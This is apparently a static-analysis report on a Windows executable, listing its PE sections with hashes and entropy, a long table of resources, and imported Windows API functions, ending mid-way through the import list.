IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2bf000 | 0x37b08 | .rdata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2be000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b7adc | 0x924 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2bb000 | 0x9c8 | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x290000 | 0x28f800 | 2a15afc612f88bad6fc9959d1810be9a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x291000 | 0x2000 | 0x1a00 | 504965db41100728bc9070db8befe522 | False | 0.548828125 | data | 6.36148269338948 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x293000 | 0xa000 | 0x9e00 | dc136f9e391b47d45742c91a2dbda720 | False | 0.5509790348101266 | data | 6.09210320597965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x29d000 | 0x1a000 | 0x1a000 | e2dea636cc20a1561f745ca26dc8a00d | False | 0.45229867788461536 | COM executable for DOS | 6.282720732739078 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2b7000 | 0x4000 | 0x3c00 | 258fa3952c7b35db824065c72de12a90 | False | 0.30703125 | COM executable for DOS | 5.206596534218449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x2bb000 | 0x1000 | 0xa00 | 5bf853b0d8341fdcf019a37d6ec39315 | False | 0.3609375 | data | 4.222908981473441 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x2bc000 | 0x1000 | 0x200 | c716644d620d407bb607fc2d4f6b41b1 | False | 0.1640625 | data | 1.103632065510809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x2bd000 | 0x1000 | 0x1000 | d4256c41ce19c2cb5cf615cbc31e10c9 | False | 0.305419921875 | data | 3.110284690356277 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2be000 | 0x39000 | 0x200 | 3986a1c707994a5e9b5e883e279780fa | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2f7000 | 0x1b6260 | 0x1b6400 | 282b2930746de2dc39d35f781bcea3eb | False | 0.41272606335567597 | data | 7.1817091597183715 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
BRANDING | 0x2fa24c | 0xf2d8 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | English | Great Britain | 0.5785452322738386
INI | 0x309524 | 0x4338 | ISO-8859 text, with CRLF line terminators | English | United States | 0.19217805671780566
INI | 0x30d85c | 0x701 | Generic INItialization configuration [Missing Shared DLLs] | English | United States | 0.36698271054099274
INI | 0x30df60 | 0x2d2fe | ISO-8859 text, with CRLF line terminators | English | United States | 0.14998433160800925
VCLSTYLE | 0x33b260 | 0x12e5b | data | English | United States | 0.9555960363293412
RT_CURSOR | 0x34e0bc | 0x134 | data | English | United States | 0.43506493506493504
RT_CURSOR | 0x34e1f0 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x34e324 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x34e458 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x34e58c | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x34e6c0 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x34e7f4 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_CURSOR | 0x34e928 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_BITMAP | 0x34ea5c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x34ec2c | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x34ee10 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x34efe0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x34f1b0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x34f380 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x34f550 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x34f720 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x34f8f0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x34fac0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x34fc90 | 0x98 | Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors | English | United States | 0.5197368421052632
RT_BITMAP | 0x34fd28 | 0x98 | Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors | English | United States | 0.506578947368421
RT_ICON | 0x34fdc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | English | United States | 0.3608156028368794
RT_ICON | 0x350228 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | English | United States | 0.2098968105065666
RT_ICON | 0x3512d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | English | United States | 0.15809128630705394
RT_ICON | 0x353878 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | English | United States | 0.12688946622579123
RT_ICON | 0x357aa0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | English | United States | 0.07723589258251508
RT_MENU | 0x3682c8 | 0x5e | data | English | Great Britain | 0.8617021276595744
RT_MENU | 0x368328 | 0x13c | data | English | Great Britain | 0.49683544303797467
RT_MENU | 0x368464 | 0x8e | data | English | Great Britain | 0.6971830985915493
RT_MENU | 0x3684f4 | 0x1aa | data | English | Great Britain | 0.42018779342723006
RT_MENU | 0x3686a0 | 0xda | data | English | Great Britain | 0.6238532110091743
RT_MENU | 0x36877c | 0x164 | data | English | Great Britain | 0.547752808988764
RT_MENU | 0x3688e0 | 0xbe | data | English | Great Britain | 0.6368421052631579
RT_MENU | 0x3689a0 | 0xae | data | English | Great Britain | 0.632183908045977
RT_MENU | 0x368a50 | 0xb8 | data | English | Great Britain | 0.657608695652174
                                                                        RT_DIALOG0x368b080x530dataEnglishGreat Britain0.42846385542168675
                                                                        RT_DIALOG0x3690380x238dataEnglishGreat Britain0.4982394366197183
                                                                        RT_DIALOG0x3692700xe8dataEnglishGreat Britain0.6508620689655172
                                                                        RT_DIALOG0x3693580x1c8dataEnglishGreat Britain0.5657894736842105
                                                                        RT_DIALOG0x3695200x1e0dataEnglishGreat Britain0.49166666666666664
                                                                        RT_DIALOG0x3697000x1acdataEnglishGreat Britain0.5607476635514018
                                                                        RT_DIALOG0x3698ac0x1ccdataEnglishGreat Britain0.5
                                                                        RT_DIALOG0x369a780x1e4dataEnglishGreat Britain0.5206611570247934
                                                                        RT_DIALOG0x369c5c0x33cdataEnglishGreat Britain0.358695652173913
                                                                        RT_DIALOG0x369f980x6b6dataEnglishGreat Britain0.3911525029103609
                                                                        RT_DIALOG0x36a6500x1a4dataEnglishGreat Britain0.5166666666666667
                                                                        RT_DIALOG0x36a7f40x1cedataEnglishGreat Britain0.48268398268398266
                                                                        RT_DIALOG0x36a9c40x4e4dataEnglishGreat Britain0.40814696485623003
                                                                        RT_DIALOG0x36aea80x57edataEnglishGreat Britain0.4139402560455192
                                                                        RT_DIALOG0x36b4280x54dataEnglishGreat Britain0.8095238095238095
                                                                        RT_DIALOG0x36b47c0xe0dataEnglishGreat Britain0.6517857142857143
                                                                        RT_DIALOG0x36b55c0x29adataEnglishGreat Britain0.47297297297297297
                                                                        RT_DIALOG0x36b7f80xdcdataEnglishGreat Britain0.6363636363636364
                                                                        RT_DIALOG0x36b8d40x70dataEnglishGreat Britain0.7857142857142857
                                                                        RT_DIALOG0x36b9440x1cedataEnglishGreat Britain0.48484848484848486
                                                                        RT_DIALOG0x36bb140x180dataEnglishGreat Britain0.5755208333333334
                                                                        RT_DIALOG0x36bc940x230dataEnglishGreat Britain0.4446428571428571
                                                                        RT_DIALOG0x36bec40xc4dataEnglishGreat Britain0.7244897959183674
                                                                        RT_DIALOG0x36bf880x14cdataEnglishGreat Britain0.5993975903614458
                                                                        RT_DIALOG0x36c0d40x462dataEnglishGreat Britain0.43137254901960786
                                                                        RT_DIALOG0x36c5380x468dataEnglishGreat Britain0.43351063829787234
                                                                        RT_DIALOG0x36c9a00x224dataEnglishGreat Britain0.5091240875912408
                                                                        RT_DIALOG0x36cbc40x286dataEnglishGreat Britain0.5046439628482973
                                                                        RT_DIALOG0x36ce4c0x1e8dataEnglishGreat Britain0.5758196721311475
                                                                        RT_DIALOG0x36d0340xc8dBase III DBT, next free block index 4294901761EnglishGreat Britain0.665
                                                                        RT_DIALOG0x36d0fc0x938dataEnglishGreat Britain0.3771186440677966
                                                                        RT_DIALOG0x36da340x462dataEnglishGreat Britain0.446524064171123
                                                                        RT_DIALOG0x36de980x48adataEnglishGreat Britain0.3717728055077453
                                                                        RT_DIALOG0x36e3240x34dataEnglishGreat Britain0.9038461538461539
                                                                        RT_DIALOG0x36e3580x336dataEnglishGreat Britain0.38929440389294406
                                                                        RT_DIALOG0x36e6900x462dataEnglishGreat Britain0.44563279857397503
                                                                        RT_DIALOG0x36eaf40xd6dBase III DBT, next free block index 4294901761EnglishGreat Britain0.7009345794392523
                                                                        RT_DIALOG0x36ebcc0x37cdataEnglishGreat Britain0.4461883408071749
                                                                        RT_DIALOG0x36ef480xd4dataEnglishGreat Britain0.6037735849056604
                                                                        RT_DIALOG0x36f01c0x2c8dataEnglishGreat Britain0.44662921348314605
                                                                        RT_DIALOG0x36f2e40x1a2dataEnglishGreat Britain0.5239234449760766
                                                                        RT_DIALOG0x36f4880x186dataEnglishGreat Britain0.5948717948717949
                                                                        RT_DIALOG0x36f6100x3b4dataEnglishGreat Britain0.4588607594936709
                                                                        RT_DIALOG0x36f9c40x38adataEnglishGreat Britain0.45916114790286977
                                                                        RT_DIALOG0x36fd500x3c8dataEnglishGreat Britain0.3894628099173554
                                                                        RT_DIALOG0x3701180x428dataEnglishGreat Britain0.36654135338345867
                                                                        RT_DIALOG0x3705400x92dataEnglishGreat Britain0.6027397260273972
                                                                        RT_DIALOG0x3705d40x39cdataEnglishGreat Britain0.4090909090909091
                                                                        RT_DIALOG0x3709700x248dataEnglishGreat Britain0.488013698630137
                                                                        RT_DIALOG0x370bb80x51cdataEnglishGreat Britain0.4258409785932722
                                                                        RT_DIALOG0x3710d40x558dataEnglishGreat Britain0.4159356725146199
                                                                        RT_DIALOG0x37162c0x4fedataEnglishGreat Britain0.4460093896713615
                                                                        RT_DIALOG0x371b2c0x544dataEnglishGreat Britain0.41839762611275966
                                                                        RT_DIALOG0x3720700x454dataEnglishGreat Britain0.4575812274368231
                                                                        RT_DIALOG0x3724c40x144dataEnglishGreat Britain0.6172839506172839
                                                                        RT_DIALOG0x3726080x514dataEnglishGreat Britain0.4276923076923077
                                                                        RT_DIALOG0x372b1c0x248dataEnglishGreat Britain0.4674657534246575
                                                                        RT_DIALOG0x372d640x1dcdataEnglishGreat Britain0.5189075630252101
                                                                        RT_DIALOG0x372f400xfcdataEnglishGreat Britain0.6746031746031746
                                                                        RT_DIALOG0x37303c0x40dataEnglishGreat Britain0.875
                                                                        RT_DIALOG0x37307c0x334dataEnglishGreat Britain0.44390243902439025
                                                                        RT_STRING0x3733b00x66Matlab v4 mat-file (little endian) C, numeric, rows 0, columns 0EnglishGreat Britain0.5882352941176471
                                                                        RT_STRING0x3734180x3a0dataEnglishGreat Britain0.3426724137931034
                                                                        RT_STRING0x3737b80x14edataEnglishGreat Britain0.45209580838323354
                                                                        RT_STRING0x3739080x112dataEnglishGreat Britain0.5656934306569343
                                                                        RT_STRING0x373a1c0x10edataEnglishGreat Britain0.5962962962962963
                                                                        RT_STRING0x373b2c0xbcdataEnglishGreat Britain0.6223404255319149
                                                                        RT_STRING0x373be80x10edataEnglishGreat Britain0.5296296296296297
                                                                        RT_STRING0x373cf80x64Matlab v4 mat-file (little endian) W, numeric, rows 0, columns 0EnglishGreat Britain0.76
                                                                        RT_STRING0x373d5c0x8cdataEnglishGreat Britain0.5214285714285715
                                                                        RT_STRING0x373de80x90dataEnglishGreat Britain0.7013888888888888
                                                                        RT_STRING0x373e780x3e6dataEnglishGreat Britain0.3897795591182365
                                                                        RT_STRING0x3742600x200dataEnglishGreat Britain0.455078125
                                                                        RT_STRING0x3744600xe4dataEnglishGreat Britain0.631578947368421
                                                                        RT_STRING0x3745440x40dataEnglishGreat Britain0.65625
                                                                        RT_STRING0x3745840xe2dataEnglishGreat Britain0.4911504424778761
                                                                        RT_STRING0x3746680x30adataEnglishGreat Britain0.32005141388174807
                                                                        RT_STRING0x3749740x4eMatlab v4 mat-file (little endian) %, numeric, rows 0, columns 0EnglishGreat Britain0.5641025641025641
                                                                        RT_STRING0x3749c40x54dataEnglishGreat Britain0.75
                                                                        RT_STRING0x374a180x2cedataEnglishGreat Britain0.38997214484679665
                                                                        RT_STRING0x374ce80x1cedataEnglishGreat Britain0.49783549783549785
                                                                        RT_STRING0x374eb80x2dcdataEnglishGreat Britain0.43579234972677594
                                                                        RT_STRING0x3751940x48adataEnglishGreat Britain0.33304647160068845
                                                                        RT_STRING0x3756200x466dataEnglishGreat Britain0.35790408525754885
                                                                        RT_STRING0x375a880x45edataEnglishGreat Britain0.35778175313059035
                                                                        RT_STRING0x375ee80xe8dataEnglishGreat Britain0.5775862068965517
                                                                        RT_STRING0x375fd00x36edataEnglishGreat Britain0.36446469248291574
                                                                        RT_STRING0x3763400x244dataEnglishGreat Britain0.41551724137931034
                                                                        RT_STRING0x3765840x30dataEnglishGreat Britain0.6666666666666666
                                                                        RT_STRING0x3765b40x84dataEnglishGreat Britain0.6060606060606061
                                                                        RT_STRING0x3766380x160dataEnglishGreat Britain0.5340909090909091
                                                                        RT_STRING0x3767980x1d4dataEnglishGreat Britain0.5042735042735043
                                                                        RT_STRING0x37696c0xb0dataEnglishGreat Britain0.6704545454545454
                                                                        RT_STRING0x376a1c0x120dataEnglishGreat Britain0.5798611111111112
                                                                        RT_STRING0x376b3c0x8edataEnglishGreat Britain0.5915492957746479
                                                                        RT_STRING0x376bcc0x240Matlab v4 mat-file (little endian) C, numeric, rows 0, columns 0EnglishGreat Britain0.4409722222222222
                                                                        RT_STRING0x376e0c0x3e2dataEnglishGreat Britain0.3983903420523139
                                                                        RT_STRING0x3771f00x390dataEnglishGreat Britain0.4144736842105263
                                                                        RT_STRING0x3775800x17edataEnglishGreat Britain0.5523560209424084
                                                                        RT_STRING0x3777000x220dataEnglishGreat Britain0.43566176470588236
                                                                        RT_STRING0x3779200x134dataEnglishGreat Britain0.5162337662337663
                                                                        RT_STRING0x377a540x3badataEnglishGreat Britain0.4025157232704403
                                                                        RT_STRING0x377e100x37edataEnglishGreat Britain0.3680089485458613
                                                                        RT_STRING0x3781900x1cadataEnglishGreat Britain0.425764192139738
                                                                        RT_STRING0x37835c0x24cdataEnglishGreat Britain0.4744897959183674
                                                                        RT_STRING0x3785a80x7edataEnglishGreat Britain0.6111111111111112
                                                                        RT_STRING0x3786280x128dataEnglishGreat Britain0.46621621621621623
                                                                        RT_STRING0x3787500x162Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0EnglishGreat Britain0.4943502824858757
                                                                        RT_STRING0x3788b40x3e8dataEnglishGreat Britain0.288
                                                                        RT_STRING0x378c9c0x322AmigaOS bitmap font "r", fc_YSize 29696, 16896 elements, 2nd "r", 3rd ""EnglishGreat Britain0.3640897755610973
                                                                        RT_STRING0x378fc00xa8dataEnglishGreat Britain0.4880952380952381
                                                                        RT_STRING0x3790680x1c8dataEnglishGreat Britain0.5263157894736842
                                                                        RT_STRING0x3792300xfcdataEnglishGreat Britain0.623015873015873
                                                                        RT_STRING0x37932c0x2b2dataEnglishGreat Britain0.463768115942029
                                                                        RT_STRING0x3795e00x7cdataEnglishGreat Britain0.717741935483871
                                                                        RT_STRING0x37965c0x5edataEnglishGreat Britain0.6808510638297872
                                                                        RT_STRING0x3796bc0x82dataEnglishGreat Britain0.7
                                                                        RT_STRING0x3797400x84dataEnglishGreat Britain0.7424242424242424
                                                                        RT_STRING0x3797c40x2c2dataEnglishGreat Britain0.41076487252124644
                                                                        RT_STRING0x379a880x178Matlab v4 mat-file (little endian) K, numeric, rows 0, columns 0EnglishGreat Britain0.5132978723404256
                                                                        RT_STRING0x379c000x2c8dataEnglishGreat Britain0.4705056179775281
                                                                        RT_STRING0x379ec80xe2AmigaOS bitmap font "s", 16640 elements, 2nd, 3rdEnglishGreat Britain0.5265486725663717
                                                                        RT_STRING0x379fac0x138Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0EnglishGreat Britain0.5
                                                                        RT_STRING0x37a0e40x46dataEnglishGreat Britain0.6857142857142857
                                                                        RT_STRING0x37a12c0xfcdataEnglishGreat Britain0.5634920634920635
                                                                        RT_STRING0x37a2280x416dataEnglishGreat Britain0.4435946462715105
                                                                        RT_STRING0x37a6400x26dataEnglishGreat Britain0.42105263157894735
                                                                        RT_STRING0x37a6680x192dataEnglishGreat Britain0.5149253731343284
                                                                        RT_STRING0x37a7fc0x126dataEnglishGreat Britain0.6020408163265306
                                                                        RT_STRING0x37a9240x31edataEnglishGreat Britain0.41729323308270677
                                                                        RT_STRING0x37ac440x9aMatlab v4 mat-file (little endian) I, numeric, rows 0, columns 0EnglishGreat Britain0.6558441558441559
                                                                        RT_STRING0x37ace00x5cdataEnglishGreat Britain0.7065217391304348
                                                                        RT_STRING0x37ad3c0xaedataEnglishGreat Britain0.6551724137931034
                                                                        RT_STRING0x37adec0x6cdataEnglishGreat Britain0.6944444444444444
                                                                        RT_STRING0x37ae580x11cdataEnglishGreat Britain0.6126760563380281
                                                                        RT_STRING0x37af740x238Targa image data 110 x 116 x 32 +99 +101EnglishGreat Britain0.5017605633802817
                                                                        RT_STRING0x37b1ac0x16adataEnglishGreat Britain0.5497237569060773
                                                                        RT_STRING0x37b3180x19cdataEnglishGreat Britain0.5
                                                                        RT_STRING0x37b4b40x5cdataEnglishGreat Britain0.6413043478260869
                                                                        RT_STRING0x37b5100x6a0dataEnglishGreat Britain0.35200471698113206
                                                                        RT_STRING0x37bbb00x5cdataEnglishGreat Britain0.7065217391304348
                                                                        RT_STRING0x37bc0c0x1e8dataEnglishGreat Britain0.514344262295082
                                                                        RT_STRING0x37bdf40x58dataEnglishGreat Britain0.6931818181818182
                                                                        RT_STRING0x37be4c0x1e0dataEnglishGreat Britain0.4666666666666667
                                                                        RT_STRING0x37c02c0x22adataEnglishGreat Britain0.37906137184115524
                                                                        RT_STRING0x37c2580x672Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishGreat Britain0.18424242424242424
                                                                        RT_STRING0x37c8cc0xdb8dataEnglishGreat Britain0.10763097949886105
                                                                        RT_STRING0x37d6840x108dataEnglishGreat Britain0.375
                                                                        RT_STRING0x37d78c0x14adataEnglishGreat Britain0.5878787878787879
                                                                        RT_STRING0x37d8d80x276dataEnglishGreat Britain0.4365079365079365
                                                                        RT_STRING0x37db500x186dataEnglishGreat Britain0.517948717948718
                                                                        RT_STRING0x37dcd80x3c6dataEnglishGreat Britain0.40372670807453415
                                                                        RT_STRING0x37e0a00x4edataEnglishGreat Britain0.6538461538461539
                                                                        RT_STRING0x37e0f00x244data0.4810344827586207
                                                                        RT_STRING0x37e3340x3f4data0.3922924901185771
                                                                        RT_STRING0x37e7280x71cdata0.3423076923076923
                                                                        RT_STRING0x37ee440xbf0data0.23036649214659685
                                                                        RT_STRING0x37fa340x420data0.3475378787878788
                                                                        RT_STRING0x37fe540x33cdata0.38768115942028986
                                                                        RT_STRING0x3801900x430data0.4048507462686567
                                                                        RT_STRING0x3805c00xd4data0.6698113207547169
                                                                        RT_STRING0x3806940xccdata0.6715686274509803
                                                                        RT_STRING0x3807600x128data0.6013513513513513
                                                                        RT_STRING0x3808880x350data0.42806603773584906
                                                                        RT_STRING0x380bd80x40cdata0.36196911196911197
                                                                        RT_STRING0x380fe40x3c0data0.3885416666666667
                                                                        RT_STRING0x3813a40x340data0.33052884615384615
                                                                        RT_STRING0x3816e40x444data0.4157509157509158
                                                                        RT_STRING0x381b280x680data0.34194711538461536
                                                                        RT_STRING0x3821a80x498data0.32908163265306123
                                                                        RT_STRING0x3826400x318data0.41414141414141414
                                                                        RT_STRING0x3829580x340data0.35697115384615385
                                                                        RT_STRING0x382c980x3e0data0.39314516129032256
                                                                        RT_STRING0x3830780x19cdata0.441747572815534
                                                                        RT_STRING0x3832140xccdata0.6274509803921569
                                                                        RT_STRING0x3832e00x198data0.5612745098039216
                                                                        RT_STRING0x3834780x3c8data0.37913223140495866
                                                                        RT_STRING0x3838400x408data0.3313953488372093
                                                                        RT_STRING0x383c480x318data0.3787878787878788
                                                                        RT_STRING0x383f600x31cdata0.34296482412060303
                                                                        RT_ACCELERATOR0x38427c0x70dataEnglishGreat Britain0.6785714285714286
                                                                        RT_RCDATA0x3842ec0x10data1.5
                                                                        RT_RCDATA0x3842fc0x748data0.5198497854077253
                                                                        RT_RCDATA0x384a440x2dataEnglishUnited States5.0
                                                                        RT_RCDATA0x384a480x415c8TrueType Font data, 19 tables, 1st "GPOS", 16 names, Macintosh, \(g\)\252 fonts 1999\251ElektraMediumTransType 3 MAC;Elektra;001.000;18/07/06 23:22:47ElektraVerEnglishUnited States0.10237935156133274
                                                                        RT_RCDATA0x3c60100x5f80TrueType Font data, 15 tables, 1st "OS/2", 21 names, UnicodeEnglishUnited States0.3445271596858639
                                                                        RT_RCDATA0x3cbf900x48f6Delphi compiled form 'TQt5QWindowOwnDCIcon'0.6848699004176036
                                                                        RT_GROUP_CURSOR0x3d08880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                        RT_GROUP_CURSOR0x3d089c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d08b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                        RT_GROUP_CURSOR0x3d08c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d08d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d08ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d09000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_CURSOR0x3d09140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                        RT_GROUP_ICON0x3d09280x4cdataEnglishUnited States0.75
                                                                        RT_VERSION0x3d09740x2e8dataEnglishUnited States0.40053763440860213
                                                                        RT_DLGINCLUDE0x3d0c5c0x59236PC bitmap, Windows 3.x format, 46076 x 2 x 37, image size 365936, cbSize 365110, bits offset 540.7019939196406563
                                                                        RT_ANIICON0x429e940xb925PC bitmap, Windows 3.x format, 6090 x 2 x 47, image size 47566, cbSize 47397, bits offset 540.4692491085933709
                                                                        RT_ANIICON0x4357bc0x9c23PC bitmap, Windows 3.x format, 5713 x 2 x 46, image size 40204, cbSize 39971, bits offset 540.3640639463611118
                                                                        RT_ANIICON0x43f3e00xacc8PC bitmap, Windows 3.x format, 6090 x 2 x 46, image size 44832, cbSize 44232, bits offset 540.3851510218846084
                                                                        RT_ANIICON0x44a0a80x348e1PC bitmap, Windows 3.x format, 27559 x 2 x 54, image size 215900, cbSize 215265, bits offset 540.47608761294218754
                                                                        RT_ANIICON0x47e98c0x2e8d3PC bitmap, Windows 3.x format, 24824 x 2 x 52, image size 191526, cbSize 190675, bits offset 540.48223416808705916
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | MessageBoxA, CharNextW, LoadStringW
kernel32.dll | Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, SetCurrentDirectoryW, GetCurrentDirectoryW, WriteFile, GetStdHandle, CloseHandle
kernel32.dll | GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll | SetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExW, mouse_event, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, 